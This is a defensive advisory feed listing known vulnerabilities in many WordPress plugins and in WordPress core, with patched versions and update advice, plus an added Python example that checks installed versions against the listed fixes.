Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yandex.News Feed by Teplitsa

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Backup and Restore WordPress – Backup Plugin

Vulnerability: Authorization Bypass
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Cross-Site Request Forgery via multiple AJAX actions
Patched Version: 2.9.32
Recommended Action: Update to version 2.9.32, or a newer patched version

Plugin: Arconix Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: MailerLite – WooCommerce integration

Vulnerability: Missing Authorization via Multiple Functions
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Cross-Site Request Forgery to Settings/Options Update
Patched Version: 6.10.24
Recommended Action: Update to version 6.10.24, or a newer patched version

Plugin: Robokassa payment gateway for Woocommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: my-category-order

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.4.2
Recommended Action: Update to version 4.4.2, or a newer patched version

Plugin: Ultimate Maps by Supsystic

Vulnerability: Authenticated SQL Injection
Patched Version: 1.1.17
Recommended Action: Update to version 1.1.17, or a newer patched version

Plugin: SodaHead Polls

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Plugin for Google Reviews

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Include Me

Vulnerability: Local File Inclusion leading to Authenticated Remote Code Execution
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: HTTP Headers

Vulnerability: Authenticated (Administrator+) Remote Code Execution
Patched Version: 1.18.11
Recommended Action: Update to version 1.18.11, or a newer patched version

Plugin: Swifty Page Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP CSV

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP User Profile Avatar

Vulnerability: Authenticated (Author+) Insecure Direct Object Reference to Avatar Deletion/Update
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_row
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.17
Recommended Action: Update to version 1.3.17, or a newer patched version

Plugin: ElementsKit Elementor addons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: BuddyMeet

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Replace Word

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Category slider for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Simple Image Popup

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: ALD – Dropshipping and Fulfillment for AliExpress and WooCommerce

Vulnerability: Missing Authorization to Order Information Disclosure
Patched Version: 1.0.22
Recommended Action: Update to version 1.0.22, or a newer patched version

Plugin: Real3D Flipbook

Vulnerability: Reflected Cross-Site Scripting via bookId parameter
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Role Based Pricing for WooCommerce

Vulnerability: Missing Authorization to PHAR Deserialization
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Duplicate Page and Post

Vulnerability: SQL Injection
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Count per Day

Vulnerability: Path Disclosure and Denial of Service
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Jigoshop – Store Toolkit

Vulnerability: Missing Authorization Checks
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Disqus Conditional Load

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 11.1.2
Recommended Action: Update to version 11.1.2, or a newer patched version

Plugin: MyCryptoCheckout – Bitcoin, Ethereum, and 100+ altcoins for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via url
Patched Version: 2.124
Recommended Action: Update to version 2.124, or a newer patched version

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: WordPress Share Buttons Plugin – AddThis

Vulnerability: Cross-Site Scripting
Patched Version: 5.0.13
Recommended Action: Update to version 5.0.13, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 13.2.11
Recommended Action: Update to version 13.2.11, or a newer patched version

Plugin: WP Shortcode by MyThemeShop

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.17
Recommended Action: Update to version 1.4.17, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Cross-Site Request Forgery via ‘regenerateSitemaps’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1
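
The "update to version X, or a newer patched version" actions above are easy to apply by hand for one plugin and easy to get wrong in bulk, especially for the WordPress core entries, where the right target depends on which maintained branch a site is on (a site on 4.9.0 needs 4.9.1, not 3.7.24, and a site on 5.x already carries the fix). The following Python is an added example, not code from this page or from any vendor: it parses entries written in this page's own listing format (the three sample entries are copied from this page and embedded as constructed input) and reports which installed components still need action. The installed-version dictionary is constructed for the example; in practice it would come from `wp core version` and `wp plugin list --format=json`, and note that WP-CLI reports plugin slugs, not the display names used here, so a mapping is needed. Treating a branch newer than any listed one as already fixed is an assumption that matches the wording "or a newer patched version".

```python
import re
from dataclasses import dataclass

# Constructed sample input: three entries copied in this page's listing format.
SAMPLE_LISTING = """\
Plugin: Duplicate Page and Post

Vulnerability: SQL Injection
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1

Plugin: Universal Star Rating

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.
"""


@dataclass
class Advisory:
    component: str                    # plugin display name, or "WordPress" for core
    vulnerability: str
    patched: list                     # list of version tuples; empty == no patch exists


def parse_version(text: str) -> tuple:
    """'2.7.9.4' -> (2, 7, 9, 4). Build suffixes such as '1.7.0-0cde1c2' are dropped."""
    core = text.strip().split('-')[0]
    return tuple(int(part) for part in core.split('.'))


def parse_listing(listing: str) -> list:
    """Split the listing into entries (each starts with 'Plugin:' or 'Core:')."""
    advisories = []
    for block in re.split(r'\n\s*\n(?=(?:Plugin|Core): )', listing.strip()):
        fields = dict(line.split(': ', 1) for line in block.splitlines() if ': ' in line)
        component = fields.get('Plugin') or fields.get('Core')
        patched_field = fields['Patched Version']
        action = fields.get('Recommended Action', '')
        if patched_field.lower().startswith('no patched version'):
            patched = []
        elif 'one of the following versions' in action:
            # Core entries list one fixed release per maintained branch after the last ': '.
            patched = [parse_version(v) for v in action.rsplit(': ', 1)[1].split(',')]
        else:
            patched = [parse_version(patched_field)]
        advisories.append(Advisory(component, fields['Vulnerability'], patched))
    return advisories


def is_vulnerable(installed: str, adv: Advisory) -> bool:
    """True when the installed version still needs action under this advisory."""
    if not adv.patched:
        return True                   # no fix exists: every installed version is affected
    inst = parse_version(installed)
    if len(adv.patched) == 1:
        return inst < adv.patched[0]  # tuple comparison: (2, 5, 6) < (2, 5, 7)
    # Several maintained branches: compare against the fix for the installed
    # major.minor branch. Assumption: a branch newer than any listed one is a
    # later release that already contains the fix; an older branch is unsupported.
    branches = {fix[:2]: fix for fix in adv.patched}
    fix = branches.get(inst[:2])
    if fix is not None:
        return inst < fix
    return inst[:2] < max(branches)


def check_site(installed: dict, advisories: list) -> list:
    """One action line per advisory that applies to an installed component."""
    findings = []
    for adv in advisories:
        version = installed.get(adv.component)
        if version is None or not is_vulnerable(version, adv):
            continue
        if adv.patched:
            targets = ', '.join('.'.join(map(str, v)) for v in adv.patched)
            findings.append(f'{adv.component} {version}: {adv.vulnerability}; update to {targets}')
        else:
            findings.append(f'{adv.component} {version}: {adv.vulnerability}; no patch, consider removal')
    return findings


if __name__ == '__main__':
    # Constructed inventory standing in for `wp core version` / `wp plugin list` output.
    inventory = {'WordPress': '4.8.3', 'Duplicate Page and Post': '2.5.7', 'Universal Star Rating': '1.2'}
    for line in check_site(inventory, parse_listing(SAMPLE_LISTING)):
        print(line)
```

Version strings are compared as integer tuples rather than as text, so 2.124 correctly sorts after 2.7 and a bare "2.5" sorts before 2.5.7; an entry with no patched version is always reported, which matches the page's advice to review and consider removal rather than wait for an update.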

Plugin: Easy Form by AYS – Form Builder Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Cookie banner plugin for WordPress – Cookiebot CMP by Usercentrics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: Cron Setup and Monitor – Get URL Cron

Vulnerability: Missing Authorization via geturlcron_action_handle
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: ThirstyAffiliates – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Subscriber+ Arbitrary Affiliate Links Creation
Patched Version: 3.10.5
Recommended Action: Update to version 3.10.5, or a newer patched version

Plugin: WP Accessibility

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected Cross-Site Scripting via keyword and ep_filter_date
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: LWS Hide Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Universal Star Rating

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Qubely – Advanced Gutenberg Blocks

Vulnerability: Missing Authorization
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: add2fav

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The WP Remote WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.65
Recommended Action: Update to version 4.65, or a newer patched version

Plugin: Flickr Justified Gallery

Vulnerability: Cross-Site Request Forgery via fjgwpp_settings()
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.9
Recommended Action: Update to version 0.9.9, or a newer patched version

Plugin: Resize at Upload Plus

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Open Redirect in Admin Dashboard
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[more_languages]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated Local File Inclusion
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: WP Spell Check

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.1.10
Recommended Action: Update to version 7.1.10, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.7.9.4
Recommended Action: Update to version 2.7.9.4, or a newer patched version

Plugin: Wufoo Shortcode

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcodes
Patched Version: 1.52
Recommended Action: Update to version 1.52, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated Information Disclosure
Patched Version: 5.12.1
Recommended Action: Update to version 5.12.1, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.11
Recommended Action: Update to version 1.9.11, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.7.29
Recommended Action: Update to version 2.7.29, or a newer patched version

Plugin: WordPress File Monitor

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: افزونه پیامک ووکامرس Persian WooCommerce SMS (the Persian part of the name reads "WooCommerce SMS plugin")

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: ActivityPub

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via User Metadata
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Mistape

Vulnerability: Backdoor
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Additional Variation Images Gallery for WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.29
Recommended Action: Update to version 1.2.29, or a newer patched version

Plugin: User Photo

Vulnerability: Arbitrary File Upload
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: WP Concours

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.6
Recommended Action: Update to version 4.3.6, or a newer patched version

Plugin: Two Factor Authentication

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Frontend Uploader

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: what3words Address Field

Vulnerability: Authenticated (Administrator+) Sensitive Information Exposure in class-w3w-autosuggest-public.php
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Worthy – VG WORT Integration für WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0-0cde1c2
Recommended Action: Update to version 1.7.0-0cde1c2, or a newer patched version

Plugin: Advanced Social Pixel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TM WooCommerce Compare & Wishlist

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.8.11
Recommended Action: Update to version 2.8.11, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.6.15
Recommended Action: Update to version 6.6.15, or a newer patched version

Plugin: Email posts to subscribers

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Martins Free And Easy SEO BackLink Link Building Network, Improve Rankings And Traffic

Vulnerability: Reflected Cross-Site Scripting via _wpnonce
Patched Version: 1.2.30
Recommended Action: Update to version 1.2.30, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Unauthenticated Arbitrary Nonce Generation
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Subscriber by BestWebSoft

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: User Activity Log

Vulnerability: IP Address Spoofing
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Authenticated PHP Object Injection
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Getwid – Gutenberg Blocks

Vulnerability: Missing Authorization to Recaptcha API Key Modification
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Mail Control – Email Customizer, SMTP Deliverability, logging, open and click Tracking

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 0.3.2
Recommended Action: Update to version 0.3.2, or a newer patched version

Plugin: Translate Multilingual sites – TranslatePress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: SQL Injection
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated Email Address Disclosure
Patched Version: 13.1.0.7
Recommended Action: Update to version 13.1.0.7, or a newer patched version

Plugin: Cost Calculator

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.6.6.1
Recommended Action: Update to version 1.6.6.1, or a newer patched version

Plugin: wpDataTables (Premium)

Vulnerability: SQL Injection
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Ultimate Noindex Nofollow Tool II

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: SpiderVPlayer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: GS Insever Portfolio

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Simple Membership

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: Export WP Page to Static HTML/CSS

Vulnerability: Cross-Site Request Forgery via Multiple AJAX Actions
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Advanced Custom Fields Pro

Vulnerability: Not specified in this entry (affects versions up to 6.1.7)
Patched Version: 6.1.8
Recommended Action: Update to version 6.1.8, or a newer patched version

Plugin: HDW Player Plugin (Video Player & Video Gallery)

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pop ups, WordPress Exit Intent Popup, Email Pop Up, Lightbox Pop Up, Spin the Wheel, Contact Form Builder – Poptin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: SlideOnline

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WhatsApp Share Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Booking Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Dynamic Content for Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.12.5
Recommended Action: Update to version 2.12.5, or a newer patched version

Plugin: Chat Widget: Customer Support Button with SMS Call Button, Click to Chat Messenger, Live Chat Support Chat Button – Bit Assist

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Product Filter by WBW

Vulnerability: Missing Authorization via getListForTbl
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: MDTF – Meta Data and Taxonomies Filter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Remove slug from custom post type

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: IBS Mappro

Vulnerability: Directory Traversal
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: Kodex Posts likes

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Simple Page Ordering

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 3.39
Recommended Action: Update to version 3.39, or a newer patched version

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation

Vulnerability: Unprotected REST-API Endpoints
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Tatsu

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 3.3.13
Recommended Action: Update to version 3.3.13, or a newer patched version

Plugin: Email Users

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.8.4
Recommended Action: Update to version 4.8.4, or a newer patched version

Plugin: WooCommerce

Vulnerability: Self-Reflected Cross-Site Scripting
Patched Version: 2.0.13
Recommended Action: Update to version 2.0.13, or a newer patched version

Plugin: Carrrot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: iPages Flipbook For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Code Snippets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.14.3
Recommended Action: Update to version 2.14.3, or a newer patched version

Plugin: LayerSlider

Vulnerability: Path Traversal
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: ZX_CSV Upload

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPS Hide Login

Vulnerability: Hidden Login Page Location Disclosure
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Web Stories

Vulnerability: Server Side Request Forgery
Patched Version: 1.25.0
Recommended Action: Update to version 1.25.0, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.7
Recommended Action: Update to version 6.8.7, or a newer patched version

Plugin: PHP Event Calendar for WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Child Theme Creator by Orbisius

Vulnerability: Cross-Site Request Forgery to Arbitrary File Modification and Creation
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.7.2
Recommended Action: Update to version 9.7.2, or a newer patched version

Plugin: Easy Panorama

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Reservation.Studio widget

Vulnerability: Cross-Site Request Forgery via plugin settings
Patched Version: 1.0.12
